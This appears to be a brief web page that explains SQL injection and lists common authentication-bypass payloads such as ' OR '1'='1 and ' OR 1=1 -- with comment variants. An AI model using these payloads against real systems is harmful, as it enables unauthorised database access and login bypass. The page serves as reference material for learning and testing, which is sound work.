What is SQL Injection?
SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures.
Interactive Payload Generator
Common SQL Injection Payloads
' OR '1'='1
' OR '1'='1' --
' OR 1=1 --
' OR 1=1#
' OR 1=1/*
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a'#
' OR 'a'='a'/*